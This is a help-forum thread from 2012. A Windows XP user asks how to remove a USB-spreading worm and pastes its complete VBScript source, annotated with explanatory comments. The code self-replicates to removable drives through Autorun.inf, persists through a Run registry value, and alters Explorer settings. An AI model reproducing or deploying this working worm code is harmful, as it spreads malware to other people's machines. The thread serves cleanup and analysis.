Hidden files and folders keep showing

March 15, 2012 at 07:05:49
Specs: Windows XP
Hello,

I have some kind of worm that replicates itself onto removable drives by creating a .vbs file containing the code below. It makes all hidden folders and files visible; the .vbs file is created in c:\windows\ and has the form M*K*H*A*.vbs (the stars are replaced with random numbers).

Can anyone help me clean this worm off my PC?

code for vbs file:

' Self-replicating VBScript, analysed for cleanup purposes:
'  - copies its own source to the Windows folder and, under a random M#K#H#A#.vbs name, to the root of
'    every removable drive together with an Autorun.inf that launches it via WScript.exe;
'  - persists through a Run value named "MKH" under HKLM;
'  - disables autorun machine-wide, forces hidden/protected-OS files to be shown (the symptom reported
'    above) and re-enables Folder Options, regedit and Task Manager;
'  - loops forever in the Windows-folder copy, killing and deleting a hard-coded table of other worms.
' No Option Explicit: undeclared names (nret) are created on first use.
Dim InfectedFiles, InfectedDir
Dim FSO, Shell, To_File, Disk_Drive, Autorun, MF, MKH_RunDir, WinDir, in_WinDir, Text, MKHSource, Temp
Dim InF, RegPath, RndName, FilNam


' Directories addressed by the table's second field (0..2). Index 3 ("All Drivers") is never used as a
' path: the cleanup loop treats it as "search the root of every ready removable or fixed drive".
InfectedDir = Array ("C:\", "C:\Windows\", "C:\Windows\System32\", "All Drivers")

' Flat table of 5 fields per entry, walked with Step 5 below:
'   file name, InfectedDir index, Run-value name to blank ("0"/"" = none), process image name handed to
'   TaskKill /IM ("0" = none), and a detection-family label that the code never reads.
InfectedFiles = Array ("2IFETRI.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"3WCXX91.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"4SV.EXE" , 3, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"4SV.EXE" , 2, "4sv" , "4SV.EXE" , "Generic VB.c" _
,"AMVO.EXE" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"AMVO0.DLL" , 2, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"ASC3360PR.SCR", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.PIF", 3, "0" , "0" , "W32-Sality.gen" _
,"ASC3360PR.EXE", 3, "0" , "0" , "W32-Sality.gen" _
,"AVP.EXE" , 3, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO.EXE" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AVPO0.DLL" , 2, "avpa" , "AVPO.EXE" , "PWS-Gamania.gen.a" _
,"AWDA2.EXE" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"BGOTRTU0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"CAPP.PIF" , 3, "0" , "0" , "0" _
,"CKTTQN.PIF" , 3, "0" , "0" , "0" _
,"CKVO.EXE" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"CKVO0.DLL" , 2, "ckva" , "0" , "PWS-Gamania.gen.a" _
,"COPY.EXE" , 3, "sqlserv" , "0" , "W32/SqlCop.worm" _
,"CTFM0N.EXE" , 2, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"DSETWEM0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"EJ10FKDO.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"GODERT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"GSIT.PIF" , 3, "0" , "0" , "0" _
,"HELP.EXE.TMP" , 2, "avpa" , "HELP.EXE.TMP", "W32/Sality.*" _
,"HNDCBM.PIF" , 3, "0" , "0" , "0" _
,"HOST.EXE" , 3, "0" , "0" , "0" _
,"HVLWLV.EXE" , 3, "0" , "0" , "0" _
,"IMAGE.EXE" , 2, "My App" , "IMAGE.EXE" , "0" _
,"IMAGE.EXE" , 3, "My App" , "IMAGE.EXE" , "0" _
,"KAMSOFT.EXE" , 2, "kamsoft" , "0" , "0" _
,"KAV.EXE" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO.EXE" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"KAVO0.DLL" , 2, "kava" , "0" , "PWS-Gamania.gen.a" _
,"L1.COM" , 3, "kava" , "0" , "PWS-Gamania.gen.a" _
,"LHGJYIT0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"MMVO.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"MMVO0.EXE" , 2, "mmva" , "0" , "PWS-Gamania.gen.a" _
,"N1DE2ECT.COM" , 0, "0" , "0" , "0" _
,"N68MQCRA.EXE" , 3, "0" , "0" , "0" _
,"NAR.VBS" , 3, "nar" , "0" , "VBS/Autorun.worm.k" _
,"NASY.EXE" , 3, "0" , "0" , "0" _
,"NIDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NLDE2ECT.COM" , 0, "0" , "0" , "0" _
,"NMDFGDS0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "Generic PWS.ak" _
,"NTDEIECT.COM" , 0, "0" , "0" , "0" _
,"NTDELECT.COM" , 0, "0" , "0" , "0" _
,"O1.COM" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"OLHRWEF.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"OPTYHWW0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"PYTDFSE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"QALA.EXE" , 3, "0" , "0" , "0" _
,"QPHDIN.COM" , 3, "cdoosoft" , "CCSVCHST.EXE", "0" _
,"QYQPLS.PIF" , 3, "0" , "0" , "0" _
,"RAV.EXE" , 3, "rava" , "0" , "PWS-Gamania.gen.a" _
,"RB.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"SCVVHSOT.EXE" , 2, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"SCVVHSOT.EXE" , 3, "0" , "SCVVHSOT.EXE", "W32/YahLover.worm.gen" _
,"TAVO.EXE" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TAVO1.DLL" , 2, "tava" , "0" , "PWS-Gamania.gen.a" _
,"TJJQTEJQ.BAT" , 3, "0" , "0" , "Generic PWS.ak" _
,"TT.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"URET463.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"URRETND.EXE" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"USERINIT.EXE" , 3, "0" , "0" , "W32/Virut.n.gen" _
,"UWEYIWE0.DLL" , 2, "cdoosoft" , "CCSVCHST.EXE", "PWS-Gamania.gen.g" _
,"WINDOWSAV.EXE", 3, "" , "CTFM0N.EXE" , "Backdoor - CEP" _
,"X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XMG.EXE" , 1, "kava" , "0" , "PWS-Gamania.gen.a" _
,"XN1I9X.COM" , 3, "amva" , "AMVO.EXE" , "W32-Autorun.worm.bx" _
,"XYJOWL.PIF" , 3, "0" , "0" , "0" _
)
' Every runtime error from here on is discarded: failed file, drive and registry operations are
' silently skipped, so none of the steps below is guaranteed to have completed.
On Error Resume Next
' Relative path of the per-machine / per-user Run key; the "MKH" value written under it below is the
' persistence mechanism, and the table's third field names other worms' values under the same key.
RegPath = "Software\Microsoft\Windows\CurrentVersion\Run\"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.shell")

' Locate this script and the Windows folder; the script copies its own source to both the Windows
' folder and the root of every removable disk.
' in_WinDir: 2 = not yet determined, 1 = running from the Windows folder, 0 = running from elsewhere.
in_WinDir = 2
' MF is this script's own File object; its text is re-read below and written into every copy.
Set MF = FSO.GetFile(Wscript.ScriptFullName)
FilNam = WScript.ScriptName
MKH_RunDir = FSO.GetParentFolderName(MF)
' GetSpecialFolder(0) is the Windows folder (C:\WINDOWS on the reporter's system).
Set WinDir = FSO.GetSpecialFolder(0)

'---Open the drive just like autorun would if it is not running from the windows directory--->
' Presumably so the user sees the drive window they expected from AutoPlay (not stated in the code).
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Shell.Run(WinDir & "\Explorer.exe /root," & MKH_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

'---If file is in windir and not running from windir then write the registry run value and exit--->
' Enter when no copy exists in the Windows folder yet, or when this IS the Windows-folder copy.
' (FileExists returns a Boolean; comparing it with 0 relies on False = 0.)
If (FSO.FileExists(WinDir & "\" & FilNam) = 0 Or in_WinDir = 1) Then
' Dead assignment: Autorun is rebuilt below before it is ever written (this form also lacks the
' space between WScript.exe and the file name).
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe" & FilNam
' Read this script's own source into MKHSource (mode 1 = ForReading, -2 = TristateUseDefault);
' ReadLine + VBCrLf normalises every line ending to CRLF in the copies.
Set Text = MF.OpenAsTextStream(1,-2)
Do While Not Text.AtEndOfStream
MKHSource = MKHSource & Text.ReadLine
MKHSource = MKHSource & VBCrLf
Loop
' First run from a removable drive: drop a copy under the original script name into the Windows folder.
If (in_WinDir = 0) Then
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
' 32 = Archive only: clears ReadOnly/Hidden/System on any existing copy so it can be overwritten.
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(WinDir & "\" & FilNam, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(WinDir & "\" & FilNam)
' 39 = Archive(32) + System(4) + Hidden(2) + ReadOnly(1): the copy is a hidden, read-only system file.
To_File.Attributes = 39
End If
'Generate the Script name
' Random drop name M#K#H#A#.vbs with each # in 1..9 (Int(9*Rnd)+1) — the M*K*H*A* pattern reported
' in the post. Randomize reseeds Rnd, so each run produces a different name.
Randomize
RndName = "M" & Int((9 * Rnd) + 1) _
& "K" & Int((9 * Rnd) + 1) _
& "H" & Int((9 * Rnd) + 1) _
& "A" & Int((9 * Rnd) + 1) _
& ".vbs"
' Autorun.inf content: a host that still honours autorun.inf runs the random-named copy via WScript.exe.
Autorun = "[autorun]" & VBCrLf & "ShellExecute = WScript.exe " & RndName
' Resident loop: in_WinDir is never assigned inside the loop, so the Windows-folder copy never exits;
' it re-infects drives and re-runs the cleanup table every 60 seconds.
Do While (in_WinDir = 1)
'---Add Script and autorun to each Removable disk drive excluding floppies--->
' DriveType 1 = Removable. Unlike the cleanup loop further down, IsReady is not checked; an empty
' slot simply raises an error that On Error Resume Next discards. (Floppy drives also report
' DriveType 1, so "excluding floppies" looks inaccurate — confirm.)
For Each Disk_Drive in FSO.Drives
If (Disk_Drive.DriveType = 1) Then
' Drop the random-named copy and a matching Autorun.inf at the drive root; both end up
' Hidden+System+ReadOnly (39) after being reset to Archive (32) so an older copy can be overwritten.
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\" & RndName, 2, True)
To_File.Write MKHSource
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & RndName)
To_File.Attributes = 39
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 32
Set To_File = FSO.CreateTextFile(Disk_Drive.Path & "\Autorun.inf", 2, True)
To_File.Write Autorun
To_File.Close
Set To_File = FSO.GetFile(Disk_Drive.Path & "\Autorun.inf")
To_File.Attributes = 39
End If
Next
'---Persistence, then disable autorun machine-wide--->
' Run value "MKH" under HKLM points at the Windows-folder copy. The remaining writes turn autorun off
' for every drive type (Cdrom AutoRun=0, NoDriveTypeAutoRun=255 = all types, NoDriveAutoRun=67108863 =
' 0x3FFFFFF = all 26 drive letters), so on an already-infected host the dropped Autorun.inf is inert.
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
Shell.RegWrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
'---Force hidden and protected-OS files to be shown (Hidden=1, ShowSuperHidden=1) and rewrite the
' Folder Options radio-button templates — this is the "hidden files keep showing" symptom, and it is
' re-applied every minute, so changing the option by hand does not stick while the script runs.
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", "1", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue", "2", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\Type", "Group", "REG_SZ"
'---Edit the registry to Enable Folder Options And RegEdit and Task Manager
' All four restrictions are set to 0 (not deleted), undoing lock-outs that other malware applies.
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"

'Clean the worms from the computer
' Walk the table 5 fields at a time. Directory index < 3: test the one fixed path; index 3: test the
' root of every ready removable (1) or fixed (2) drive. Both branches do the same four things: kill
' the process by image name, blank the other worm's Run value in both hives, clear the file's
' attributes, and delete it with cmd /C DEL (unquoted path taken straight from the table).
For InF = 0 To UBound(InfectedFiles) Step 5
If (InfectedFiles(InF + 1) < 3) Then
If (FSO.FileExists(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF)) = True) Then
' "0" placeholders in the process field just produce a failing, harmless TaskKill.
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF))
To_File.Attributes = 32
' File objects have no Close method; this raises an error that On Error Resume Next swallows.
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & InfectedDir(InfectedFiles(InF + 1)) & InfectedFiles(InF), 0, True)

End If
Else
For Each Disk_Drive In FSO.Drives
If ((Disk_Drive.DriveType = 1 Or Disk_Drive.DriveType = 2) And Disk_Drive.IsReady) Then
If (FSO.FileExists(Disk_Drive.Path & "\" & InfectedFiles(InF)) = True) Then
nret = Shell.Run("TaskKill.exe /IM " & InfectedFiles(InF + 3),0,True)
If (InfectedFiles(InF + 2) <> "0") Then
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
Shell.RegWrite "HKEY_CURRENT_USER\" & RegPath & InfectedFiles(InF + 2),"","REG_SZ"
End If
Set To_File = FSO.GetFile(Disk_Drive.Path & "\" & InfectedFiles(InF))
To_File.Attributes = 32
To_File.Close
nret = Shell.Run("Cmd.exe /C DEL " & Disk_Drive.Path & "\" & InfectedFiles(InF), 0, True)
End If
End If
Next
End If
Next
' One minute between passes; nothing in the loop body ever ends it.
WScript.Sleep(60000)
Loop
'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
' Only the removable-drive instance reaches here (the Windows-folder copy is still in the loop above):
' it starts the Windows-folder copy (window style 1, don't wait) and then falls through to exit.
If (FSO.GetAbsolutePathName(WinDir) <> FSO.GetAbsolutePathName(MKH_RunDir)) Then
Temp = WinDir & "\" & FilNam
Shell.Run Temp, 1, 0
End If
End If
' Run persistence is re-written unconditionally on every start. Cleanup therefore means removing this
' "MKH" Run value, the copy in the Windows folder (both the original name and any M#K#H#A#.vbs), and the
' hidden M#K#H#A#.vbs + Autorun.inf at the root of each removable drive, while no instance is running.
Shell.RegWrite "HKEY_LOCAL_MACHINE\" & RegPath & "MKH", WinDir & "\" & FilNam, "REG_SZ"





#1
March 15, 2012 at 22:54:33
http://home.mcafee.com/virusinfo/vi...

Basically, any decent up-to-date AV software should be able to remove it, according to links found by Googling.

Also please do not post log files unless requested.

Googling is quicker than waiting for an answer....



